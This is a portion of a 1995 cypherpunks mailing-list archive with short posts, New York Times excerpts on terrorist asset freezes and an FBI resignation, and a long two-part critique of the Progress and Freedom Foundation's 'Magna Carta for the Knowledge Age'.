Message-ID: <Pine.SUN.3.91.950125124718.10006L-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, James A. Donald wrote:

> For example all unix machines are vulnerable to the trojan horse attack.

Ah, which one would this be?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mo Baxter <morpheus@math.whitman.edu>
Date: Wed, 25 Jan 95 12:53:16 PST
To: Matthew Ghio <ghio@myriad.pc.cc.cmu.edu>
Subject: Starting a remailer
Message-ID: <Pine.SOL.3.91.950125121853.5452A-100000@calvin>
MIME-Version: 1.0
Content-Type: text/plain


I need info on what's needed to operate a secure remailer out of an edu
address.  I'd appreciate anything on programs, installation, maintenance,
problems, etc... 

Thanks,
	Mo

		"We're all in it together."
				--Harry Tuttle 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 25 Jan 95 10:00:54 PST
To: cypherpunks@toad.com
Subject: NYT on USG Threats
Message-ID: <199501251800.NAA02070@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 
   The New York Times 
   January 25, 1995, p. A9. 
 
   [Excerpts] 
 
   Clinton Orders Assets of Suspected Terrorist Groups Frozen 
 
 
   By Douglas Jehl 
 
 
   Washington, Jan. 24 -- Seeking to underscore an American 
   commitment to the fight against terrorism, President 
   Clinton today issued an executive order intended to cut off 
   the flow of funds from United States citizens to 
   organizations suspected of terrorist activities in Israel 
   and other countries. 
 
 
   Mr. Clinton's directive orders American financial 
   institutions to search for and immediately freeze any 
   accounts held in the names of Hamas, Islamic Holy War and 
   10 other organizations, and 18 of their top leaders. 
 
 
   It also forbids financial transfers from the United States 
   to those groups and individuals and will seek to prevent 
   them from gaining access to donations made to charitable 
   causes in the Middle East. 
 
 
   Administration officials said it was too soon to know 
   whether any assets would be uncovered. 
 
 
   While today's announcement at the White House emerged from 
   an Administration review concluding that the United States 
   could do more to limit terrorists' access to money, aides 
   to Mr. Clinton acknowledged that the timing had been 
   largely dictated by the quest for a tough-worded 
   centerpiece to the State of the Union address. 
 
 
   The aides said Mr. Clinton intended to use the speech in 
   part to demonstrate his commitment to preserving foreign 
   policy gains in the Middle East against those who would 
   scuttle peace efforts. 
 
 
   Even if the groups identified today do not hold accounts in 
   their names, the officials said the directive could give 
   the Government more power to block and deter transfers to 
   them -- even when those are disguised as contributions to 
   charity. 
 
 
   "It is not foolproof," a senior Administration official 
   said at a White House briefing this afternoon. "It is 
   capable of being circumvented through a variety of 
   stratagems." But another official said the measures could 
   "essentially sever the lifeline that keeps these 
   organizations going." 
 
   *** 
 
   A statement issued by three major American Islamic 
   organizations warned that the initiative could "have a 
   negative impact on legitimate political expression by 
   American Muslims and others." 
 
 
   But advocates of the plan said it represented no more than 
   a first step, even though Administration officials said 
   they would need to see further evidence that charitable 
   contributions were being used to support terrorist 
   operations before the Government would seek to block 
   operations by Muslim and Islamic groups active in raising 
   money in the United States. 
 
 
   Administration officials say that much of that money is 
   used for legitimate purposes in building mosques, providing 
   food and milk and otherwise helping Palestinian communities 
   like the ones in Gaza and the occupied West Bank. 
 
 
   But State Department officials have said that millions of 
   dollars a year from the United States ends up in the hands 
   of militants in the Hamas organization, whose total 
   spending is estimated by Israeli officials at $30 million 
   a year and they said a test of the initiative would be 
   whether it could cut back that flow. 
 
 
   For now, the names of groups and individuals whose assets 
   are to be frozen or blocked under Mr. Clinton's order reads 
   like a who's who list of organizations and people identified 
   as terrorists. 
 
 
   In addition to Hamas and Islamic Holy War, they include the 
   Palestine Liberation Front and its leader, Mohammed Abul 
   Abbas -- also known as Abu Abbas --  as well as the two 
   rival factions of the Popular Front for the Liberation of 
   Palestine. 
 
 
   The list also includes two militant Jewish organizations, 
   Kach and Kahane Chai, which were spawned by Rabbi Meir 
   Kahane and were outlawed by Israel early last year. 
 
 
   The authority that Mr. Clinton invoked today in blocking 
   the assets is provided to the President under the 
   International Emergency Economic Powers Act, which was used 
   by President Carter to freeze Iranian assets when Americans 
   were being held hostage in Teheran. 
 
 
   But the White House made clear that Mr. Clinton intended to 
   ask Congress soon for even more sweeping authority to curb 
   terrorism, including wider powers to use wiretapping and 
   swift deportation procedures against suspects. 
 
 
   ---------- 
   End 
 
 
 
   The New York Times 
   January 25, 1995, p. B6. 
 
 
   Head of the F.B.I. In New York Resigns 
 
 
   After a year as the head of the Federal Bureau of 
   Investigation's New York office, William A. Gavin said 
   yesterday that he was leaving for an executive post with a 
   medical-care company. 
 
 
   Mr. Gavin, 53, said he would retire in March as a deputy 
   assistant F.B.I. director to join U.S. Healthcare, in Blue 
   Bell, Pa, one of the country's largest health maintenance 
   organizations. The F.B.I. has a mandatory retirement age of 
   57. 
 
 
   Last January, Louis J. Freeh, the F.B.I. director, named 
   Mr. Gavin to run the office at an annual salary of 
   $130,000. But he was not promoted to the title of assistant 
   director, the rank normally given to the agency's top 
   manager in New York, one of the agency's most prestigious 
   assignments. 
 
 
   An agent and supervisor for 27 years, Mr. Gavin was in 
   charge of the investigations that led to the convictions of 
   four men for the 1993 bombing of the World Trade Center and 
   the indictments of 12 other men accused of plotting to blow 
   up the trade center and other New York landmarks. The 12 
   defendants are currently on trial in Federal District Court 
   in Manhattan. 
 
 
   Law-enforcement officials said yesterday that James 
   Kallstrom, a supervisory agent in New York, was considered 
   the most likely candidate to be chosen by Mr. Freeh to take 
   over the office. Mr. Kallstrom is now in charge of special 
   operations, the unit responsible for the surveillance and 
   the electronic monitoring of criminal suspects. 
 
 
   ---------- 
   End 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 25 Jan 95 11:54:20 PST
To: cypherpunks@toad.com
Subject: In Re: Modem Tax
Message-ID: <v01510106ab4c4e7b1d52@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


        I wanted to oh so thankfully thank all 15 of you who so calmly and
straightforwardly set me straight on this subject. I must apologize for my
dire misdeed in presenting this to the list. Maybe you could all form a
lynch mob, come on down to good ole Tennessee and beat this poor ignorant
Hillbilly to death, hang him from a tree, and burn a few crosses while you're
at it.


         READ: Rude.

         Thank you.

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Wed, 25 Jan 95 06:00:24 PST
To: cypherpunks@toad.com
Subject: Magna Carta Analyzed (1/2)
Message-ID: <199501251358.NAA14088@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain




Detailed analysis of:

        Cyberspace and the American Dream:
        A Magna Carta for the Knowledge Age
        Release 1.2 // August 22, 1994
        Progress and Freedom Foundation
        Co-authors:
            Ms. Esther Dyson
            Mr. George Gilder
            Dr. George Keyworth
            Dr. Alvin Toffler

Analysis By:

        Richard K. Moore
        rkmoore@iol.ie
        20 January 1995


-----------------------------------------------------

This document is a condensed version of the Magna Carta (MC), with
extensive commentary.

Some sections of MC, especially the introductory material, are quoted in
entirety.

Some sections are  summarized by me, with representative passages cited.
Other sections are boiled down with ellipses to their meat. Asterisks are
used to add emphasis to the source text.


-rkm


___________________________________________________


 Cyberspace and the American Dream:
A Magna Carta for the Knowledge Age
Release 1.2 // August 22, 1994

 ----------------------------------------

This statement represents the cumulative wisdom and
innovation of many dozens of people.  It is based
primarily on the thoughts of four "co-authors":  Ms.
Esther Dyson; Mr. George Gilder; Dr. George Keyworth;
and Dr. Alvin Toffler. This release 1.2 has the final
"imprimatur" of no one.  In the spirit of the age:  It
is copyrighted solely for the purpose of preventing
someone else from doing so.  If you have it, you can
use it any way you want.  However, major passages are
from works copyrighted individually by the authors,
used here by permission; these will be duly
acknowledged in release 2.0.  It is a living document.
Release 2.0 will be released in October 1994. We hope
you'll use it is to tell us how to make it better.  Do
so by:
    -  Sending E-Mail to PFF@AOL.COM
    -  Faxing 202/484-9326 or calling 202/484-2312
    -  Sending POM (plain old mail) to 1250 H. St. NW,
       Suite 550
       Washington, DC 20005

(The Progress & Freedom Foundation is a not-for-profit
research and educational organization dedicated to
creating a positive vision of the future founded in
the historic principles of the American idea.)
 ----------------------------------------

PREAMBLE

The central event of the 20th century is the overthrow
of matter. In technology, economics, and the politics
of nations, wealth -- in the form of physical
resources -- has been losing value and significance.
The powers of mind are everywhere ascendant over the
brute force of things.
In a First Wave economy, land and farm labor are the
main "factors of production." In a Second Wave
economy, the land remains valuable while the "labor"
becomes massified around machines and larger
industries. In a Third Wave economy, the central
resource -- a single word broadly encompassing data,
information, images, symbols, culture, ideology, and
values -- is _actionable_ knowledge.

The industrial age is not fully over. In fact, classic
Second Wave sectors (oil, steel, auto-production) have
learned how to benefit from Third Wave technological
breakthroughs -- just as the First Wave's agricultural
productivity benefited exponentially from the Second
Wave's farm-mechanization.

But the Third Wave, and the _Knowledge Age_ it has
opened, will not deliver on its potential unless it
adds social and political dominance to its
accelerating technological and economic strength. This
means repealing Second Wave laws and retiring Second
Wave attitudes. It also gives to leaders of the
advanced democracies a special responsibility -- to
facilitate, hasten, and explain the transition.

As humankind explores this new "electronic frontier"
of knowledge, it must confront again the most profound
questions of how to organize itself for the common
good. The meaning of freedom, structures of self-
government, definition of *property*, nature of
*competition*, conditions for *cooperation*, sense of
community and nature of *progress* will each be
redefined for the Knowledge Age -- just as they were
redefined for a new age of industry some 250 years
ago.

What our 20th-century countrymen came to think of as
the "American dream," and what resonant thinkers
referred to as "the promise of American life" or "the
American Idea,"  emerged from the turmoil of 19th-
century industrialization. Now it's our turn: The
knowledge revolution, and the Third Wave of historical
change it powers, summon us to renew the dream and
enhance the promise.


THE NATURE OF CYBERSPACE

The Internet -- the huge (2.2 million computers),
global (135 countries), rapidly growing (10-15% a
month) network that has captured the American
imagination -- is only a tiny part of cyberspace. So
just what is cyberspace?

More ecosystem than machine, cyberspace is a
bioelectronic environment that is literally universal:
It exists everywhere there are telephone wires,
coaxial cables, fiber-optic lines or electromagnetic
waves.

This environment is "inhabited" by *knowledge*,
including incorrect ideas, existing in electronic
form. It is connected to the physical environment by
portals which *allow people to see what's inside*, to
put knowledge in, to alter it, and to take knowledge
out. Some of these portals are one-way (e.g.
television receivers and television transmitters);
others are two-way (e.g. telephones, computer modems).

[  Hey! I thought *we* were the residents of
[  cyberspace, not the electrons!
[
[  Here's where the condensation starts.
[
[  They continue building the model that cyberspace is
[  a big data world that people can access. No
[  perception of cyberspace *embodying* communities of
[  people. People are to participate as individual
[  consumer/navigator of cyberspace's resources.
[
[  Here's a representative sample of the slogan-
[  coating that colors their presentation:

...Cyberspace is the land of knowledge, and the
exploration of that land can be a civilization's
truest, highest calling. The opportunity is now before
us to empower every person to pursue that calling in
his or her own way.

The challenge is as daunting as the opportunity is
great. The Third Wave has profound implications for
the nature and meaning of property, of the
marketplace, of community and of individual freedom.
As it emerges, it shapes new codes of behavior that
move each organism and institution -- family,
neighborhood, church group, company, government,
nation -- inexorably beyond standardization and
centralization, as well as beyond the materialist's
obsession with energy, money and control.

[  Next comes the first entry of the leit-motiv:
[  "government" as the villain of the story.

It also spells the death of the central institutional
paradigm of modern life, the bureaucratic
organization. (Governments, including the American
government, are the last great redoubt of bureaucratic
power on the face of the planet, and for them the
coming change will be profound and probably
traumatic.)...

[  Corporations, as a seat of bureaucratic power,
[  manage to escape notice here. Ah well, so many
[  details, so little time...
[
[  Next, they show how hip they are by pointing out
[  the narrowness of the "superhighway" metaphor, and
[  the aptness of the "cyberspace"
[  metaphor. They break the 2nd-wave bounds of linear
[  ASCII  messaging to give us a brilliant two-
[  dimensional table with which to compare the
[  metaphors in a futuristic light:

_Information Superhighway_   /    _Cyberspace_

Limited Matter               /     Unlimited Knowledge
Centralized                  /     Decentralized
Moving on a grid             /     Moving in space
Government ownership         /     A vast array of
                                   ownerships
Bureaucracy                  /     Empowerment
Efficient but not hospitable /     Hospitable if you
                                   customize it
Withstand the elements       /     Flow, float and
                                   fine-tune
Unions and contractors       /     Associations and
                                   volunteers
Liberation from First Wave   /     Liberation from
                                   Second Wave
Culmination of Second Wave   /     Riding the Third
                                   Wave ...

[  Well, OK, I buy it. I bought it ten years ago.
[
[  ---
[
[  The first major character in the story now makes an
[  appearance. He is brother "private property",
[  endowed by his creator with inalienable rights.
[  Those rights are to be the very
[  cornerstone of the cyberspace frontier:

THE NATURE AND OWNERSHIP OF PROPERTY

Clear and enforceable property rights are essential
for markets to work. Defining them is a central
function of government. Most of us have "known" that
for a long time. But to create the new cyberspace
environment is to create _new_ property -- that is,
new means of creating goods (including ideas) that
serve people.

The property that makes up cyberspace comes in several
forms: Wires, coaxial cable, computers and other
"hardware";  the electromagnetic spectrum; and
"intellectual property" -- the knowledge that dwells
in and defines cyberspace.

[
[  Cyberspace is clearly defined as being a repository
[  for "knowledge  property". This definition is
[  summarized in their phrases:
[
[   "the knowledge that dwells in and defines
[    cyberspace"
[
[     " to create...cyberspace...is to create _new_
[       property"
[
[  They next set out a dichotomy -- we are to decide
[  between two options for cyber-property ownership,
[  private & public:

In each of these areas, two questions that must be
answered. First, what does "ownership" _mean_? What is
the nature of the property itself, and what does it
mean to own it? Second, once we understand what
ownership means, _who_ is the owner? At the level of
first principles, should ownership be public (i.e.
government) or private (i.e. individuals)? ...

[  Brother "private property" is asking to be accepted
[  as  "everyman", to be the character the reader
[  identifies with. He claims to represent the
[  "individual". Well... OK so far. But methinks
[  Plato is entrapping me...
[
[  Is it true that "public" includes no other options
[  than direct government ownership?
[
[  And is it true that "private" means ownership by
[  individuals?
[  And if so, is that all individuals, or a few
[  individuals?
[  The unfolding story will make this clear.
[
[  ---
[
[  They make one really ominous statement in this
[  section:

If this analysis is correct, copyright and patent
protection of knowledge (or at least many forms of it)
may no longer be unnecessary...

[  That word "knowledge" is scary in this context. Do
[  they mean that ideas and facts are to be
[  patentable? We see such a trend
[  in genetic engineering already.
[
[  In the cyberspace context, are they proposing that
[  intellectual concepts themselves will be
[  patentable? If so, then presumably it will happen
[  on a  wholesale basis.
[  Will schools pay knowledge royalties to teach the
[  three R's?
[
[  ---
[
[  Their next section is entitled "THE NATURE OF THE
[  MARKETPLACE". I'll pass most of it along, trimmed
[  by a few ellipses and punctuated by asterisks:

THE NATURE OF THE MARKETPLACE

Inexpensive knowledge destroys economies-of-scale.
Customized knowledge permits "just in time" production
for an ever rising number of *goods*. Technological
progress creates new means of serving old markets,
turning *one-time monopolies* into *competitive
battlegrounds*.

These phenomena are altering the nature of the
marketplace, ...transformed by technological progress
from a "*natural monopoly*" to one in which
competition is the rule.

Three recent examples:

*  The market for "mail" has been made competitive by
the development of fax machines and overnight delivery
...During the past 20 years, the market for television
has been transformed from ... a few broadcast TV
stations to one in which consumers can choose among
broadcast, cable and satellite services.

*  The market for local telephone services, until
recently a monopoly..., is rapidly being made
competitive by the advent of wireless service and the
entry of cable television into voice communication...

The advent of new technology and new products creates
the potential for _dynamic competition...Dynamic
competition is better, because it allows competing
technologies and new products to challenge the old
ones and, if they really are better, to replace them.
Static competition might lead to faster and stronger
horses. Dynamic competition gives us the automobile...

Then the personal-computing industry exploded, leaving
older-style big-business-focused computing with a
stagnant, piece of a burgeoning total market. As IBM
lost market-share, many people became convinced that
America had lost the ability to compete. By the mid-
1980s, such alarmism had reached from Washington all
the way into the heart of Silicon Valley.

But the real story was the renaissance of American
business and technological leadership. In the
transition from mainframes to PCs, a vast new market
was created. This market was characterized by *dynamic
competition* consisting of easy access and low
barriers to entry. Start-ups by the dozens took on the
larger established companies -- and won.

...The reason for America's victory in the computer
wars of the 1980s is that dynamic competition was
allowed to occur, in an area so breakneck and pell-
mell that government would've had a hard time
controlling it _even had it been paying attention_.
The challenge for policy in the 1990s is to permit,
even encourage, dynamic competition in every aspect of
the cyberspace marketplace.

[  The meat of the story is now unfolding. Cyberspace
[  is simply a new mass communications marketplace.
[  The players are telcos, fiber operators, wireless
[  providers, and entrepreneurs of all flavors.
[
[  Consumers play no role in this drama, their benefit
[  comes when they get to choose among the commercial
[  services being arranged for them.
[
[  Brother "private property" who was "the
[  individual" in scene one, has now become a typical
[  corporate board member, dealing with mergers,
[  acquisitions, new-product planning, and new forms
[  of competition.
[
[  Notice the explicit call for *dynamic competition*
[  as being central to a good cyberspace. Watch later
[  how they switch sides on this issue several times.
[
[  ---
[
[  Now on to the next section:

THE NATURE OF FREEDOM

Overseas friends of America sometimes point out that
the U.S. Constitution is unique -- because it states
explicitly that power resides with the people, who
delegate it to the government, rather than the other
way around...

This idea -- central to our free society -- was the
result of more than 150 years of intellectual and
political ferment, from the Mayflower Compact to the
U.S. Constitution, as explorers struggled to establish
the terms under which they would tame a new frontier.

And as America continued to explore new frontiers --
from the Northwest Territory to the Oklahoma land-rush
-- it consistently returned to this fundamental
principle of rights, reaffirming, time after time,
that power resides with the people.

[
[  Those of you with color screens probably noticed
[  the red-white-and-blue background on this
[  stationery.
[
[  The argument has touched deep ground here. Our
[  American heritage, our very duty as American
[  citizens, demands that we agree that power in
[  cyberspace should reside with "the people".
[
[  Fine, until you find out who "the people"
[  are. Stay tuned.

Cyberspace is the latest American frontier. As this
and other societies make ever deeper forays into it,
the proposition that ownership of this frontier
resides first _with the people_ is central to
achieving its true potential...

[  I'm skipping four long paragraphs of fluff, to the
[  effect that the struggle for freedom never ends,
[  and that this generation must do its part.
[
[  Next comes the second appearance of the leit-motif.
[  The "evil government" character broadens out to
[  represent the entire "2nd Wave" mentality.
[
[  Government itself is possibly one of the 2nd Wave
[  anachronisms to be left behind.
[

*  In a Second Wave world, it might make sense for
government to insist on the right to peer into every
computer by requiring that each contain a special
"clipper chip."

*  In a Second Wave world, it might make sense for
government to assume ownership over the broadcast
spectrum and demand massive payments from citizens for
the right to use it.

*  In a Second Wave world, it might make sense for
government to prohibit entrepreneurs from entering new
markets and providing new services.

*  And, in a Second Wave world, dominated by a few
old-fashioned, one-way media "networks," it might even
make sense for government to influence which political
viewpoints would be carried over the airwaves...

[
[  I just heard about the 3rd Wave last month, and
[  already we're seeing a revisionist history of the
[  2nd Wave.
[
[  What America have these guys been living in? We've
[  encouraged entrepreneurs to enter new markets
[  throughout our history, from railroad building,
[  to mining, to Thomas Edison, John D. Rockefeller,
[  Henry Ford, the aircraft industry, ad infinitum.
[
[  I never made massive payments to the government to
[  watch TV. Which planet are these guys from?
[
[  But they *do* make sense if you accept the
[  equation:
[     "citizen" == "communications company"
[  because communication companies do pay license
[  fees. But those fees are nominal for corporations,
[  though they might seem large to an individual.
[
[  Thus they skate from one meaning of "individual" to
[  the other, even in mid thought.
[
[  ---
[
[  The next section is called THE ESSENCE OF THE
[  COMMUNITY. I'll skip most of it -- it's really
[  vacuous. I'll just give you the last two paragraphs
[  to illustrate the flavor of this idling segment of
[  the storyline:

"...But unlike the private property of today," Salin
continued, "the potential variations on design and
prevailing customs will explode, because many
variations can be implemented cheaply in software. And
the 'externalities' associated with variations can
drop; what happens in one cyberspace can be kept from
affecting other cyberspaces."

"Cyberspaces" is a wonderful _pluralistic_ word to
open more minds to the Third Wave's civilizing
potential. Rather than being a centrifugal force
helping to tear society apart, cyberspace can be one
of the main forms of glue holding together an
increasingly free and diverse society.

-------------------------------------------------
[End of MC Analysis (1/2)]



---

Richard K. Moore - rkmoore@iol.ie - Wexford, Ireland - fax +353 53 23970






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rkmoore@iol.ie (Richard K. Moore)
Date: Wed, 25 Jan 95 06:00:39 PST
To: cypherpunks@toad.com
Subject: Magna Carta Analyzed (2/2)
Message-ID: <199501251359.NAA14098@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain





Detailed Analysis of PFF's Magna Carta - Part 2 of 2

By: Richard K. Moore
    20 January, 1995


-----------------------------------------------------
[
[
[  This next section is the heart of the story.
[  Evil "government" is to be vanquished by brother
[  "private property" -- watch as the two masks
[  ("individual" and "communications provider")
[  switch back and forth faster than the mind can see.
[

THE ROLE OF GOVERNMENT

The current Administration has identified the right
goal: Reinventing government for the 21st
Century....This said, it is essential that we
understand what it really means to create a Third Wave
government and begin the process of transformation.

...The most pressing need...is to revamp the policies
and programs that are slowing the creation of
cyberspace...if there is to be an "industrial policy
for the knowledge age," it should focus on removing
barriers to competition and massively deregulating the
fast-growing telecommunications and computing
industries...

...the transition from the Second Wave to the Third
Wave will require a level of government _activity_ not
seen since the New Deal....

[  A nice-sounding vision for cyberspace is pulled in
[  from the New York Times:

"The amount of electronic material the superhighway
can carry is dizzying, compared to the relatively
narrow range of broadcast TV and the limited number of
cable channels.  Properly constructed and regulated,
it could be open to all who wish to speak, publish and
communicate. None of the interactive services will be
possible, however, if we have an eight-lane data
superhighway rushing into every home and only a narrow
footpath coming back out. Instead of settling for a
multimedia version of the same entertainment that is
increasingly dissatisfying on today's TV, we need a
superhighway that encourages the production and
distribution of a broader, more diverse range of
programming" (New York Times 11/24/93 p. A25).

[
[  The individualist aspects of this vision play no
[  further part in our story. The sole item adopted
[  by PFF seems to be the requirement for
[  symmetric  bandwidth. Could this be establishing a
[  pecking order between telcos and cable-operators,
[  giving the edge to the telcos with their more
[  symmetric architectures? ... an open question.
[
[  We now come to an amazing shift of ground in our
[  story. It's almost Kafkaesque or even
[  Ionescoesque in its blatant reversal of
[  established story line.
[
[  What they're going to do is passionately espouse
[  the creation of a gigantic monopoly among the
[  telcos and cable operators to build and operate
[  cyberspace. Even though "dynamic competition" was
[  the rallying cry up to this point, we're now to
[  learn that "contrived competition between phone
[  companies and cable operators" "will not deliver
[  the two-way, multimedia and more civilized tele-
[  society Kapor and Berman sketch."
[

...reducing barriers to entry and innovation [is] the
only effective near-term path to Universal Access.  In
fact, it can be argued that a near-term national
interactive multimedia network is impossible unless
regulators permit much greater **collaboration**
between the cable industry and phone companies. The
latter's huge fiber resources...could be joined with
the huge asset of 57 million broadband links...to
produce a new kind of national network -- multimedia,
interactive and (as costs fall) increasingly
accessible to Americans of modest means.

That is why obstructing such collaboration -- in the
cause of forcing a competition between the cable and
phone industries -- is *socially elitist*. To the
extent it prevents collaboration between the cable
industry and the phone companies, present federal
policy actually thwarts the Administration's own goals
of access and empowerment...

...If Washington forces the phone companies and cable
operators to develop supplementary and duplicative
networks, most other advanced industrial countries
will attain cyberspace democracy -- via an interactive
multimedia "open platform" -- before America does,
despite this nation's technological dominance.

...A contrived competition between phone companies and
cable operators will not deliver the two-way,
multimedia and more civilized tele-society Kapor and
Berman sketch. Nor is it enough to simply "get the
government out of the way." Real issues of antitrust
must be addressed, and no sensible framework exists
today for addressing them. Creating the conditions for
universal access to interactive multimedia will
require a fundamental rethinking of government policy.
[
[  How Orwellian can you get? Those of us who bought
[  into the glory of dynamic competition earlier on
[  have now become "socially elitist" -- unless we
[  have a mind which can switch identities and change
[  positions as adroitly as our illustrious authors.
[
[  Their cyberspace manifesto now reads:
[        (1) strong private property rights
[        (2) infrastructure to be owned by a
[            private monopoly
[  ---
[
[  The pace of doublespeak picks up now. In the
[  next section we're back in the "competition" camp,
[  finding out why regulation must be eliminated from
[  the communications game, to be replaced by
[  an anti-trust model.
[

   ...Promoting Dynamic Competition

Technological progress is turning the
telecommunications marketplace from one characterized
by "economies of scale" and "natural monopolies" into
a prototypical competitive market. The challenge for
government is to encourage this shift -- to create the
circumstances under which new competitors and new
technologies will challenge the natural monopolies of
the past.

Price-and-entry regulation makes sense for natural
monopolies. The tradeoff is a straightforward one: The
monopolist submits to price regulation by the state,
in return for an exclusive franchise on the market.

But what happens when it becomes economically
desirable to have more than one provider in a market?
The continuation of regulation under these
circumstances stops progress in its tracks. It
prevents new entrants from introducing new
technologies and new products, while depriving the
regulated monopolist of any incentive to do so on its
own.

Price-and-entry regulation, in short,  is the
antithesis of dynamic competition.

The alternative to regulation is antitrust. Antitrust
law is designed to prevent the acts and practices that
can lead to the creation of new monopolies, or harm
consumers by forcing up prices, limiting access to
competing products or reducing service quality.
Antitrust law is the means by which America has, for
over 120 years, fostered competition in markets where
many providers can and should compete.

The market for telecommunications services --
telephone, cable, satellite, wireless -- is now such a
market...price/entry regulation of telecommunications
services...should therefore be replaced by antitrust
law as rapidly as possible.

...there should be no half steps. Moving from a
regulated environment to a competitive one is -- to
borrow a cliche -- like changing from driving on the
left side of the road to driving on the right: You
can't do it gradually.

[
[  Though the "justification" arguments illogically
[  contradict one another, the "conclusions" of those
[  arguments add up to a coherent proposal.
[
[     What the authors are proposing is an
[           *unregulated monopoly*
[
[     It is not surprising that they had to twist
[     logic several times to pack both words into a
[     manifesto, and make it seem like both are
[     natural and consistent consequences of
[     "competitive spirit" and the "American Dream".
[
[  Their cyberspace manifesto now reads:
[        (1) strong private property rights
[        (2) infrastructure to be owned by a
[            unregulated private monopoly
[  ---
[
[  Next they double-click on property rights:
[

    ...Defining and Assigning Property Rights

...Defining property rights in cyberspace is perhaps
the single most urgent and important task for
government information policy. Doing so will be a
complex task, and each key area -- the electromagnetic
spectrum, intellectual property, cyberspace itself
(including the right to privacy) -- involves unique
challenges. The important points here are:

First, this is a "central" task of government...

Secondly, the key principle of ownership by the people
-- private ownership  -- should govern every
deliberation. *Government does not own cyberspace,
the people do.*...

[
[  Here's where the doublespeak pays off. They can
[  make a statement like "the people own cyberspace"
[  and manage to imply they are empowering
[  the individual, when they've already stated clearly
[  that ownership is to be vested in a large monopoly
[  conglomerate. I must tip my hat to their skill.
[
[  In an earlier review, I described this document as
[  grossly rambling and inconsistent. I now have more
[  respect for it. It's masterfully deceitful, and
[  manages to marshall contradictory arguments in
[  support of a coherent business proposal.
[
[  ---
[
[  We now move to another corporate business concern.
[  Such concerns are clearly the domain of serious
[  discourse addressed in the Magna Carta. The rest of
[  the verbiage is a meaningless, crowd-pleasing
[  smokescreen.
[
[  Here we have a plea for rapid capital depreciation.
[  That would be quite a windfall for a conglomerate
[  investing billions in an infrastructure.
[
[  Once again the taxpayer is asked to subsidize the
[  R&D bill for new technology, but the ownership
[  benefit is to go exclusively to the private
[  operator. This has been the pattern since the New
[  Deal.
[
[

 ...Creating Pro-Third-Wave Tax and Accounting Rules

We need a whole set of new ways of accounting, both at
the level of the enterprise, and of the economy.

...At the level of the enterprise, obsolete accounting
procedures cause us to systematically _overvalue_
physical assets (i.e. property) and _undervalue_
human-resource assets and intellectual assets. So, if
you are an inspired young entrepreneur looking to
start a software company, or a service company of some
kind, and it is heavily information-intensive, you
will have a harder time raising capital than the guy
next door who wants to put in a set of beat-up old
machines to participate in a topped-out industry.

On the tax side, the same thing is true...

It is vital that accounting and tax policies -- both
those promulgated by private-sector regulators like
the Financial Accounting Standards Board and those
promulgated by the government at the IRS and elsewhere
-- start to reflect the shortened capital life-cycles
of the Knowledge Age, and the increasing role of
_intangible_ capital as "wealth."

[
[  Their cyberspace manifesto now reads:
[        (1) strong private property rights
[        (2) infrastructure to be owned by a
[            unregulated private monopoly
[        (3) investment to be written off rapidly
[  ---
[
[  Next they get into a discussion of transforming
[  government. I'm not sure why they're departing
[  from their focused agenda of launching cyberspace
[  as a private monopoly. Perhaps they think they're
[  on a roll, and might as well go for the whole
[  enchilada -- a corporate state.
[

    ...Creating a Third Wave Government

Going beyond cyberspace policy per se, government must
remake itself and redefine its relationship to the
society at large...there are some yardsticks we can
apply to policy proposals...[vacuous ones omitted]

_Does it centralize control_? Second Wave policies
centralize power in bureaucratic institutions; Third
Wave policies work to spread power -- to empower those
closest to the decision...

A serious effort to apply these tests to every area of
government activity  -- from the defense and
intelligence community to health care and education
-- would ultimately produce a complete transformation
of government as we know it. Since that is what's
needed, let's start applying.

[
[  With their usual twists of logic, we'd probably
[  learn that other constellations of private
[  interests, perhaps including additional unregulated
[  monopolies, should be running all these other
[  areas of public life as well.
[
[  The closing section is vacuous but for
[  background smoke. I'll cite a few representative
[  paragraphs...
[

GRASPING THE FUTURE

The conflict between Second Wave and Third Wave
groupings is the central political tension cutting
through our society today. The more basic political
question is not who controls the last days of
industrial society, but who shapes the new
civilization rapidly rising to replace it. Who, in
other words, will shape the nature of cyberspace and
its impact on our lives and institutions?...

The Third Wave sector includes not only high-flying
computer and electronics firms and biotech start-ups.
It embraces advanced, information-driven manufacturing
in every industry...

For the time being, the entrenched powers of the
Second Wave dominate Washington and the statehouses...

...a "mass movement" for cyberspace is still hard to
see. Unlike the "masses" during the industrial age,
this rising Third Wave constituency is highly
diverse...This very heterogeneity contributes to its
lack of political awareness. It is far harder to unify
than the masses of the past.

[  I guess the Magna Carta is to bring about this
[  unity. Perhaps they seek to form an "internet cult"
[  and the Magna Carta is the "mind-programming"
[  formula being trial-posted. I think they'll find
[  most of us not that easily programmed. We're too
[  professionally familiar with the technology of
[  programming, and are equipped to judge the internal
[  consistency of models.

Yet there are key themes on which this constituency-
to-come can agree. To start with, liberation -- from
Second Wave rules, regulations, taxes and laws laid in
place to serve the smokestack barons and bureaucrats
of the past. Next, of course, must come the creation
-- creation of a new civilization, founded in the
eternal truths of the American Idea.

It is time to embrace these challenges, to grasp the
future and pull ourselves forward. If we do so, we
will indeed renew the American Dream and enhance the
promise of American life.

[
[  There you have it. The American Dream and frontier
[  competitiveness lead us inevitably to the following
[  mandate for cyberspace:
[        (1) strong private property rights
[        (2) infrastructure to be owned by an
[            unregulated private monopoly
